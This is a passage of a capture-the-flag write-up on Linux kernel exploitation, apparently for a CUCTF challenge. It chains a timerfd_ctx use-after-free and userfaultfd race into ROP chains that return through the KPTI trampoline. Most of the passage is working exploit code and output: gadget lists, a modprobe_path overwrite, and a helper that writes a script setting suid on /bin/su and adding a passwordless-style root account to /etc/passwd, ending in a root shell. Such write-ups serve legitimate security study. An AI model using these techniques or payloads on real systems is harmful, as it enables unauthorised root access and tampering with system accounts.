    : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags) : : "memory" );
}

And we can read the flag using:

void read_flag()
{
  char flag[100];
  read(open("/flag", O_RDONLY), flag, 100);
  puts(flag);
}

If we use the second gadget, our ROP-chain will be:

*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff81053680UL; // pkc
*rop ++= kernel_base + 0xffffffff8108bacaUL; // mov rdi, rax; call 0x2d1350; mov rax, -9; pop rbp; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff810537d0UL; // cc
*rop ++= kernel_base + 0xffffffff8118a8d3UL; // pop rcx; ret;
*rop ++= (unsigned long)(read_flag);
*rop ++= kernel_base + 0xffffffff81008b7dUL; // pop r11; pop r12; pop rbp; ret;
*rop ++= usr_rflags;
*rop ++= 0; // r12
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff81200106UL; // kpti_trampoline (sysret)
*rop ++= 0; // rax
*rop ++= 0; // rdi
*rop ++= (unsigned long)(fake_stack + 0x1000); // rsp

Here’s the third poc: poc3.c, let’s compile it and execute it:

            / $ /home/user/poc3
            [*] Allocating/Freeing timerfd_ctx structure...
            [*] Leaking timerfd_tmrproc address...
            [+] Object dump:
              0000  0xffff88800029b800    0x0000000000000000      
              0010  0x0000000000000000    0x00000002de088cb1      
              0020  0x00000002de088cb1    0xffffffff81102a00      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd7ad3bf6c2aae81    0xffff88800029b888      
              0090  0xffff88800029b888    0x0000000000000000      
              00a0  0x0000000000000000    0xffff888000157600      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            [+] Leaked timerfd_ctx structure address: 0xffff88800029b800            
            [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
            [+] Kernel base address: 0xffffffff00000000
            [*] Mmapping page...
            [*] Start monitoring range: 0xdead000 - 0xdeae000
            [*] Triggering page fault...
            [+] Page fault at address 0xdead000!
            [*] Freeing...
            [*] Creating second timer...
            [*] Structure will be overwritten with:
              0000  0x000000000cafe800    0x0000000000000000      
              0010  0x0000000000000000    0x000000000eae0e65      
              0020  0x000000000eae0e65    0xffffffff81027b86      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd7ad3bf6c2aae81    0xffff88800029b888      
              0090  0xffff88800029b888    0x0000000000000000      
              00a0  0x0000000000000000    0xffff888000157600      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            CUCTF{TEST}

            BUG: unable to handle page fault for address: 00000001034cc473
            #PF: supervisor instruction fetch in kernel mode
            [...]

The kernel crashed, but we successfully read the flag [1]! Cool, but it’s not enough. We want a shell.

Initially I tried to replace the read_flag() function with:

static void execve_shell(void)
{
  if (getuid() != 0)
  {
    puts("[ERROR] We are not root!");
    exit(1);
  }

  puts("[+] We are root!");
  execve("/bin/sh", 0, 0);
}

but this led to a crash every single time. So I started debugging the kernel, and I finally found a way to get a shell.

First of all, we need to fix the timerfd_ctx structure that we corrupted in the previous steps. I replaced the first address (idx 0) with the original timerfd_ctx structure address and the sixth address (idx 5, now it is our pivot gadget) with the gadget:

    0xffffffff810001dc: ret;    

So when the function pointer will be called again, the call will simply return.

// Fix idx 0x0
*rop ++= kernel_base + 0xffffffff81027b8eUL; // mov rax, rdi; ret;
*rop ++= kernel_base + 0xffffffff8106e24aUL; // mov rsi, rax; sub rsi, rcx; cmp rdx, rax; cmovs r8, rsi; mov rax, r8; ret;
*rop ++= kernel_base + 0xffffffff81027b8eUL; // mov rax, rdi; ret;
*rop ++= kernel_base + 0xffffffff810f6180UL; // mov qword ptr [rax], rsi; ret;

// Fix idx 0x5
*rop ++= kernel_base + 0xffffffff8113f9b6UL; // pop rdx; ret;
*rop ++= 0x28;
*rop ++= kernel_base + 0xffffffff81012183UL; // add rax, rdx; ret;
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff810001dcUL; // ret;
*rop ++= kernel_base + 0xffffffff810f6180UL; // mov qword ptr [rax], rsi; ret;

But even after this change, I coudn’t use system/execve/execveat and so on. So how can we get a shell?

In Linux, when an user executes a program with an unknown program header, the system will call __request_module that will call call_modprobe and call_modprobe will use call_usermodehelper_exec to execute the program specified by modprobe_path. modprobe_path usually corresponds to /sbin/morprobe.

So if we overwrite modprobe_path with the location of a script controlled by us, for example /home/user/x, every time we execute a file with an unknown program header, the system will run our script instead of /sbin/modprobe.

We can use the following function to automatically create a file with an unknown program header (/home/user/asd) and the script that will add a new user (/home/user/x).

void prepare_exploit()
{
  system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /home/user/asd");
  system("chmod +x /home/user/asd");
  system("echo '#!/bin/sh' > /home/user/x");
  system("echo 'chmod +s /bin/su' >> /home/user/x");
  system("echo 'echo \"asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh\" >> /etc/passwd' >> /home/user/x");
  system("chmod +x /home/user/x");
}

Let’s continue our ROP-chain:

// Hijack modprobe_path
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0x73752f656d6f682f; // su/emoh/
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff81837c20UL; // modprobe_path
*rop ++= kernel_base + 0xffffffff810a5417UL; // mov qword ptr [rsi], rdi; ret;

*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0x782f7265; // x/re
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff81837c20UL + 8UL; // modprobe_path
*rop ++= kernel_base + 0xffffffff810a5417UL; // mov qword ptr [rsi], rdi; ret;

At this point we only need to find a way to avoid kernel crash. To succeed in our goal we can return in userspace after hijacking modprobe_path and simply execute:

static void do_nothing(void)
{
  return;
}

In this way, after hijacking modprobe_path, our exploit will successfully exit and we will be able to execute /home/user/asd to force the kernel executing our malicious script:

(I also tried to trap the thread using int3 and it worked too).

// pkc -> cc -> kpti trampoline -> userspace -> ret
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff81053680UL; // pkc
*rop ++= kernel_base + 0xffffffff8108bacaUL; // mov rdi, rax; call 0x2d1350; mov rax, -9; pop rbp; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff810537d0UL; // cc
*rop ++= kernel_base + 0xffffffff8118a8d3UL; // pop rcx; ret;
*rop ++= (unsigned long)(do_nothing); // return
*rop ++= kernel_base + 0xffffffff81008b7dUL; // pop r11; pop r12; pop rbp; ret;
*rop ++= usr_rflags;
*rop ++= 0; // r12
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff81200106UL; // kpti_trampoline (sysret)
*rop ++= 0; // rax
*rop ++= 0; // rdi
*rop ++= (unsigned long)(fake_stack + 0x1000); // rsp

Is important to note that to maximize the exploit success rate, we need perfect timing. I found the right compromise using sleep(1.8) before ioctl_userfaultfd and using 0xeae0e65 as expiration time. I still have to dig deeply to understand why exactly it is needed.

This will be our final exploit: exploit.c, utils.h

            / $ /home/user/exploit
            [*] Allocating/Freeing timerfd_ctx structure...
            [*] Leaking timerfd_tmrproc address...
            [+] Object dump:
              0000  0xffff88800029b600    0x0000000000000000      
              0010  0x0000000000000000    0x00000002dc1b84cb      
              0020  0x00000002dc1b84cb    0xffffffff81102a00      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd74d3bf6c2aaa81    0xffff88800029b688      
              0090  0xffff88800029b688    0x0000000000000000      
              00a0  0x0000000000000000    0xffff888000157f00      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            [+] Leaked timerfd_ctx structure address: 0xffff88800029b600            
            [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
            [+] Kernel base address: 0xffffffff00000000
            [+] Modprobe path address: 0xffffffff81837c20
            [*] Mmapping page...
            [*] Start monitoring range: 0xdead000 - 0xdeae000
            [*] Triggering page fault...
            [+] Page fault at address 0xdead000!
            [*] Freeing...
            [*] Creating second timer...
            [*] Structure will be overwritten with:
              0000  0x000000000cafe800    0x0000000000000000      
              0010  0x0000000000000000    0x000000000eae0e65      
              0020  0x000000000eae0e65    0xffffffff81027b86      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd74d3bf6c2aaa81    0xffff88800029b688      
              0090  0xffff88800029b688    0x0000000000000000      
              00a0  0x0000000000000000    0xffff888000157f00      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            [*] Fake stack at: 0xcafe000
            [+] Execute: "/home/user/asd" to add a new user: asd / asdasdasd
            / $ cat /etc/passwd
            root:x:0:0:root:/root:/bin/sh
            user:x:1000:1000:Linux User,,,:/home/user:/bin/sh
            / $ /home/user/asd // [1]
            /home/user/asd: line 1: ������: not found
            / $ cat /etc/passwd
            root:x:0:0:root:/root:/bin/sh
            user:x:1000:1000:Linux User,,,:/home/user:/bin/sh
            asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh // [2]
            / $ su asd
            Password:
            / # id
            uid=0(root) gid=0(root) groups=0(root)
            / #

As we can see, when we execute /home/user/asd [1], the kernel will use call_modprobe, but since we replaced modprobe_path with the location of our malicuous script, a new user will be added [2].

Finally, we can enjoy our root shell!

Challenge link: here.

References

SMEP

KPTI

Misc devices

Slab allocator

timerfd_ctx

Userfaultfd

Exploit scheme

modprobe_path